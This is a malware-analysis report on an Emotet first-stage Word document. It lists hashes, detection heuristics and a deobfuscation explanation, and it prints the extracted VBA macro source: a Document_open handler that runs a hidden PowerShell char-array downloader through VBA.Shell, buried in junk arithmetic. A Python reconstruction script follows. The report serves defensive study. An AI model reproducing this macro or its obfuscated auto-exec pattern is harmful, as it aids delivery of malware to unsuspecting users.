Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7eb72e8dae664e91…

MALICIOUS

Office (OLE)

Size: 124.0 KB
Created: 2018-06-14 21:25:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: e15cec050fe20e7833aa66084d2a751a
SHA-1: 9bcb52b44b8d87f353d463004c59c0d699a0a604
SHA-256: 7eb72e8dae664e9117d7bb0046bfc641907f581fade34db474605b14f7fa4888
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros with a Document_open handler that calls the function tYrLPPm(), which in turn invokes VBA.Shell(); the document therefore launches an external process as soon as macros run. Almost every other statement in both modules is junk arithmetic on variables that are never assigned, wrapped in On Error Resume Next so the resulting type errors are swallowed; its only purpose is to bury the one meaningful line. The Shell() command string is assembled at run time from fragments: Chr(zAsfpw + vbKeyP + cbQDlchnkKi) evaluates to "P" because vbKeyP is 80 and the other two operands are never assigned in the extracted source (an unassigned Variant is Empty, i.e. 0), followed by the literal "owers" and the return value of DjYiKiSOah(), whose visible fragments begin "HeLL [STrIN" + "g]::JOIn" + "('',([Char[" + "]] (112,2", that is, a PowerShell command that rebuilds its real payload from an array of character codes. The window-style argument is 44598 - 44598 = 0 (vbHide), so the PowerShell window is never shown to the user. ClamAV explicitly identifies the file as 'Doc.Downloader.Emotet-6877385-0', consistent with an Emotet first-stage document whose purpose is to download and execute a secondary payload. The junk-padded obfuscation, the hidden Shell() launch and the PowerShell char-array stage together confirm the malicious intent.

Heuristics (6)

  • CLAMAV_DETECTION (critical): ClamAV: Doc.Downloader.Emotet-6877385-0
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877385-0
  • OLE_VBA_MACROS (medium, 3 related findings): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
    The macro calls VBA.Shell(), i.e. it starts an external process from the document
  • OLE_VBA_DOCOPEN (high): Document_Open macro
    A Document_Open handler runs automatically when the document is opened (subject to the macro security setting), which is the auto-execution trigger for the Shell() call
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI found in ordinary Office documents; it is not a network indicator and should not be treated as a download or C2 location.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17073 bytes
SHA-256: 7144bb067d1fb5b2446e8cffa87b65187569af00dcddc6d0ca82c262b481a98c
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "HRaWGVfGBMEn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function tYrLPPm()
On Error Resume Next
Qvptoc = Sqr(91878)
vITWW = 71872 + WacDj + (54275 * CDbl(ftAioY) - UECnO / CSng(62228) - sliwhX / Hex(mvRBc) + 35450 - 44138)
GtwVVj = pajFV
BQwuaE = iIFFi - uFwEtt / 96546 / dMGwon - 223327908 + Hex(wUrXw) * jhlda - Round(65074)
EJfLNI = Sqr(34175)
rYEpwm = 31996 + joNhh + (56252 * CDbl(YNbTL) - AkptD / CSng(95745) - RHfwn / Hex(UIcvin) + 33085 - 41204)
isXNsq = qqpuj
NbYdqo = wvowr - IQtiIF / 91487 / wftwB - 223327908 + Hex(fNrkJz) * RVPVdU - Round(25781)
EzHQZ = Sqr(35538)
vifpI = 68886 + EEpszr + (90811 * CDbl(MfkiSO) - bUijmb / CSng(26746) - FdSAZl / Hex(oMdPiv) + 55279 - 71730)
izSdWv = ldEDWM
tCPCLK = zHqYj - fqVsX / 81897 / EDjlw - 223327908 + Hex(FioTzF) * pYwKii - Round(57569)
wwmWR = Sqr(11285)
qSiDbE = 87497 + osTwZ + (13026 * CDbl(KJtMkY) - vPFMMQ / CSng(23370) - EWtFi / Hex(jfCZuX) + 37079 - 90954)
jHoWtW = OcPtjt
WILuXP = Osdwjo - CTYMii / 82474 / qBcAMI - 223327908 + Hex(ZtuwE) * kuoIR - Round(64339)
tYrLPPm = UBLczC + VBA.Shell(qstLihGVR + Chr(zAsfpw + vbKeyP + cbQDlchnkKi) + "owers" + DjYiKiSOah + hBfOAAdpccw + OKwqi + ibTckNt + jaaNSFSznz + SzbRcnvYkhA, 44598 - 44598)
YwVJdE = Sqr(58923)
SKRWDp = 97770 + jClkw + (33731 * CDbl(jENwD) - ZattF / CSng(27315) - KkHWuR / Hex(kWlOs) + 78001 - 25636)
jRajGG = dOJmbJ
ZfFbs = YdzaLI - uOpfwn / 26096 / zEOtr - 223327908 + Hex(vYwli) * firppa - Round(2134)
bzdPS = Sqr(24303)
ZaqhAi = 57355 + BpdbT + (22955 * CDbl(AqYmQ) - immoI / CSng(44620) - tSGSP / Hex(IRwHZS) + 37871 - 7298)
IQRcFi = jfiiQR
oFdBZr = EtrKSL - iKMYDF / 3722 / wTwHSL - 223327908 + Hex(LtEwOi) * oOURd - Round(88932)
End Function
Private Sub Document_open()
On Error Resume Next
hvbLS = Sqr(35845)
HJESY = 55115 + iwGTw + (9584 * CDbl(VwEmcH) - QLuOl / CSng(35123) - uCpslY / Hex(fJCsAc) + 61215 - 68919)
iIBsj = oQrOGc
ciVkqz = DmKTn - QbKjnq / 78201 / tbfoj - 223327908 + Hex(MSKHf) * PNNQoD - Round(64794)
isqDn = Sqr(37547)
iCpvJn = 93702 + cDoMjD + (26335 * CDbl(rjIoDo) - WwtYGh / CSng(27689) - CziiLa / Hex(tuDNdm) + 38136 - 61036)
wFqIrn = GlvXcd
juQTwQ = qCOTm - BYCTz / 80986 / lpLwC - 223327908 + Hex(mqNrK) * jIwkuH - Round(88758)
tYrLPPm
LviLBV = Sqr(66365)
EDqjRQ = 64094 + YcLDXC + (11660 * CDbl(oHMFM) - YiwfVA / CSng(63740) - WTGwiE / Hex(AcrMw) + 11927 - 68832)
iMLOTh = FJqXE
zkUiL = mvhzsG - zZYBwn / 60391 / sOdof - 223327908 + Hex(kqofLo) * GNJZv - Round(25480)
njhMYX = Sqr(18911)
qHWrp = 62085 + BFsRj + (34003 * CDbl(qLObAa) - ZMNPLY / CSng(43972) - jiail / Hex(zrSkP) + 20609 - 78650)
vfBOdH = VGJEh
iDGOQu = biIfm - NqCjQ / 82469 / wrlPA - 223327908 + Hex(Zdhzzz) * rwXXX - Round(3935)
End Sub


Attribute VB_Name = "iqFHfCU"
Function DjYiKiSOah()
On Error Resume Next
MLTHw = 89216 + jwcHJ + (72606 * CDbl(pwhTYp) - UFrkPo / CSng(25895) - KXpNk / Hex(wikfF) + 69053 - 12203)
sDESrG = XhGANo - SwAOs / 29371 / oSGnZM - 223327908 + Hex(fSzNKV) * lJSfqG - Round(23409)
svEwoA = Sqr(15991)
muVDOi = pGWMbu
jCSlLzu = "HeLL [STrIN" + "g]::JOIn" + "('',([Char[" + "]] (112,2"
lwfSt = 61947 + PGnCSa + (63690 * CDbl(iiBIlr) - WuRYS / CSng(42927) - ZFRia / Hex(KnNwa) + 37519 - 64617)
GkFMSb = AVNWtj - lnzjbv / 40074 / hRJZa - 223327908 + Hex(cKXAI) * zjZOij - Round(4400)
wppNvW = Sqr(25856)
zjsHnc = vZHtr
rQIIvnRh = "1 , 56," + "21 ,38" + " ,23 , 13 ,116" + ", "
WBCnC = 84726 + jYKqW + (70648 * CDbl(iEOkws) - HdUUVN / CSng(22808) - awHFqM / Hex(ilLqhV) + 77770 - 33458)
QCZOXh = hipjw - iQulj / 50977 / YHKXTL - 223327908 + Hex(tSwfAm) * rDRza - Round(92906)
aDOjz = Sqr(76473)
bNzoM = EBOPu
YujJZhcWkd = "105,116 ," + "58" + ",49, " + "35,121,59 , 5" + "4,62 ,49 ,55 ," + " 32 , 116" + ",38,53,58, " + "48 ,59 ,57" + " ,"
KFIrB = 90700 + kZOjJ + (63007 * CDbl(wrNco) - iKuwS / CSng(66763) - IJjJVj / Hex(bMiLPC) + 28455 - 23415)
... (truncated)
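The Shell() assembly described in the analysis above, worked through in code as an added example (this is not part of the original report or of oletools). It takes a constructed excerpt of the macro preview on this page, discards the junk-arithmetic padding, resolves Chr(vbKeyP + ...) using the documented VBA KeyCode constants, concatenates the string fragments of DjYiKiSOah() and reports the Shell() window style. Assumptions: the never-assigned names behave as Empty (0 in arithmetic, "" in concatenation), and the fragment literals of DjYiKiSOah() are consumed in source order (the page's preview is truncated before the function's return statement, so that order is inferred, not verified).

```python
import re
import string

# Constructed excerpt of the macro preview on this page: the Document_open handler, the
# tYrLPPm() function holding the Shell() call and the visible fragments of DjYiKiSOah().
# Two representative junk-arithmetic lines are kept so the filter has something to drop.
SAMPLE_VBA = r'''
Function tYrLPPm()
On Error Resume Next
Qvptoc = Sqr(91878)
vITWW = 71872 + WacDj + (54275 * CDbl(ftAioY) - UECnO / CSng(62228) - sliwhX / Hex(mvRBc) + 35450 - 44138)
tYrLPPm = UBLczC + VBA.Shell(qstLihGVR + Chr(zAsfpw + vbKeyP + cbQDlchnkKi) + "owers" + DjYiKiSOah + hBfOAAdpccw + OKwqi + ibTckNt + jaaNSFSznz + SzbRcnvYkhA, 44598 - 44598)
End Function
Private Sub Document_open()
On Error Resume Next
tYrLPPm
End Sub
Function DjYiKiSOah()
On Error Resume Next
jCSlLzu = "HeLL [STrIN" + "g]::JOIn" + "('',([Char[" + "]] (112,2"
rQIIvnRh = "1 , 56," + "21 ,38" + " ,23 , 13 ,116" + ", "
YujJZhcWkd = "105,116 ," + "58" + ",49, " + "35,121,59 , 5" + "4,62 ,49 ,55 ," + " 32 , 116" + ",38,53,58, " + "48 ,59 ,57" + " ,"
End Function
'''

# VBA KeyCode constants: vbKeyA..vbKeyZ are 65..90, vbKey0..vbKey9 are 48..57.
VB_KEY_CONSTANTS = {f"vbKey{c}": ord(c) for c in string.ascii_uppercase + string.digits}
# Shell() window styles; 0 (vbHide) starts the process with no visible window.
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}

def is_junk(line):
    """An assignment with no string literal and no Chr()/Shell()/CreateObject call is
    dead arithmetic on never-assigned variables (On Error Resume Next hides its errors)."""
    s = line.strip()
    if s.lower() == "on error resume next":
        return True
    if not re.match(r"^\w+\s*=", s):
        return False
    return not re.search(r'"|\bChr\(|\bShell\(|CreateObject', s, re.I)

def strip_junk(vba):
    return [ln.rstrip() for ln in vba.splitlines() if ln.strip() and not is_junk(ln)]

def resolve_chr(expr):
    """Chr(a + vbKeyP + b): names that are not KeyCode constants are unassigned Variants
    (assumption: Empty, which is 0 in arithmetic)."""
    total = 0
    for tok in expr.split("+"):
        tok = tok.strip()
        total += int(tok) if tok.isdigit() else VB_KEY_CONSTANTS.get(tok, 0)
    return chr(total)

def procedure_body(vba, name):
    m = re.search(r"^(?:Private\s+|Public\s+)?(?:Function|Sub)\s+" + re.escape(name)
                  + r"\b[^\n]*\n(.*?)^End\s+(?:Function|Sub)", vba, re.S | re.M | re.I)
    return m.group(1) if m else None

def split_concat(expr):
    """Split a VBA concatenation on top-level '+' (not inside parentheses or quotes)."""
    parts, cur, depth, in_str = [], "", 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            depth += {"(": 1, ")": -1}.get(ch, 0)
            if ch == "+" and depth == 0:
                parts.append(cur.strip())
                cur = ""
                continue
        cur += ch
    parts.append(cur.strip())
    return parts

def eval_token(tok, vba):
    if tok.startswith('"') and tok.endswith('"'):
        return tok[1:-1]
    m = re.fullmatch(r"Chr\((.*)\)", tok, re.I)
    if m:
        return resolve_chr(m.group(1))
    body = procedure_body(vba, tok)
    if body is not None:
        # Assumption: the called function returns its fragment literals in source order.
        return "".join(re.findall(r'"([^"]*)"', body))
    return ""  # never-assigned Variant: Empty + "str" is "str" in VBA

def eval_int(expr):
    if not re.fullmatch(r"[\d\s+\-*/()]+", expr.strip()):
        raise ValueError(f"non-numeric window-style expression: {expr!r}")
    return int(eval(expr))  # only digits and arithmetic operators reach eval()

def rebuild_shell_command(vba):
    """Return (command string, window style) for the first Shell() call in the macro."""
    m = re.search(r"Shell\((.*),\s*([^,]+?)\)\s*$", vba, re.M)
    if not m:
        raise ValueError("no Shell() call found")
    command = "".join(eval_token(t, vba) for t in split_concat(m.group(1)))
    return command, eval_int(m.group(2))

def decode_char_array(command):
    """Turn the [Char[]] (n, n, ...) list into (codes, text) as [String]::Join would."""
    m = re.search(r"\[Char\[\]\]\s*\((.*)", command, re.I | re.S)
    codes = [int(n) for n in re.findall(r"\d+", m.group(1))] if m else []
    return codes, "".join(chr(c) for c in codes)

if __name__ == "__main__":
    print("\n".join(strip_junk(SAMPLE_VBA)))
    cmd, style = rebuild_shell_command(SAMPLE_VBA)
    print(f"Shell({cmd!r}, {style} = {WINDOW_STYLES.get(style, '?')})")
    print(decode_char_array(cmd))
```

Run stand-alone, the script prints the five lines of the macro that do anything, then the reconstructed call: Shell("PowersHeLL [STrINg]::JOIn('',([Char[]] (112,21 , 56, ...", 0 = vbHide). The 27 visible character codes do not decode to readable text, which is expected: the preview on this page cuts the array off, so either it continues past the preview or another transform is applied before the command runs; finishing the decode needs the rest of the extracted macro, not a guess.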